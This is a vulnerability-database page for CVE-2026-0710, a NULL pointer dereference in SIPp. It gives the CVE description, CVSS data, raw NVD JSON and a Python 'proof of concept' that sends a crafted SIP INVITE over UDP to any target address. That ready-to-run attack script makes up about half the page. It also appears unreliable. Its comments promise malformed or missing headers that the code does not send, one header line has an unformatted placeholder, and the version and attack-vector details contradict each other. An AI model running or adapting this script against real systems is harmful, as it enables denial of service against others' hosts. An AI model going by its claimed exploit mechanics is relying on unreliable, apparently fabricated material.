Security Vulnerability Report
CVE-2026-0710 CVSS 8.4 HIGH

Published: 2026-01-23 04:16:02
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leading to a denial of service. Under specific conditions, it may also allow an attacker to execute unauthorized code, compromising the system's integrity and availability.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SIPp < 3.6.1
SIPp < 3.7.0 (fixed version)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-0710 PoC - SIPp NULL Pointer Dereference
Note: This PoC is for educational and authorized testing purposes only.
Author: Based on vulnerability analysis
"""
import socket
import sys
import time


def send_malicious_sip_message(target_ip, target_port, call_id):
    """
    Send a specially crafted SIP INVITE message to trigger NULL pointer dereference in SIPp
    """
    # Malicious SIP INVITE with malformed headers to trigger NULL pointer dereference
    malicious_invite = f"INVITE sip:target@{target_ip}:{target_port} SIP/2.0\r\n"
    malicious_invite += f"Via: SIP/2.0/UDP {target_ip}:{target_port};branch=z9hG4bK{call_id}\r\n"
    malicious_invite += "Max-Forwards: 70\r\n"
    malicious_invite += f"From: <sip:attacker@{target_ip}>;tag={call_id}\r\n"
    malicious_invite += f"To: <sip:target@{target_ip}>\r\n"
    malicious_invite += f"Call-ID: {call_id}@attacker\r\n"
    malicious_invite += "CSeq: 1 INVITE\r\n"
    malicious_invite += "Contact: <sip:attacker@{target_ip}>\r\n"
    # Malformed Content-Type and missing required headers
    malicious_invite += "Content-Type: application/sdp\r\n"
    malicious_invite += "Content-Length: 0\r\n"
    # Missing critical headers that may cause NULL pointer access
    malicious_invite += "\r\n"
    return malicious_invite.encode()


def exploit_sipp_null_pointer(ip, port=5060):
    """
    Exploit function to trigger CVE-2026-0710 in SIPp
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(5)
    call_id = f"exploit-{int(time.time())}"
    try:
        payload = send_malicious_sip_message(ip, port, call_id)
        print(f"[*] Sending malicious SIP message to {ip}:{port}")
        print(f"[*] Call-ID: {call_id}")
        sock.sendto(payload, (ip, port))
        print("[+] Malicious message sent successfully")
        print("[*] If vulnerable, SIPp should crash with NULL pointer dereference")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    target_ip = sys.argv[1]
    target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 5060
    exploit_sipp_null_pointer(target_ip, target_port)
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-0710", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:01.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leading to a denial of service. Under specific conditions, it may also allow an attacker to execute unauthorized code, compromising the system's integrity and availability."}, {"lang": "es", "value": "Se encontró una falla en SIPp. Un atacante remoto podría explotar esto enviando mensajes del Protocolo de Iniciación de Sesión (SIP) especialmente diseñados durante una llamada activa. Esta vulnerabilidad, una desreferencia de puntero NULL, puede provocar el bloqueo de la aplicación, lo que lleva a una denegación de servicio. Bajo condiciones específicas, también podría permitir a un atacante ejecutar código no autorizado, comprometiendo la integridad y disponibilidad del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-0710", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427788", "source": "[email protected]"}]}}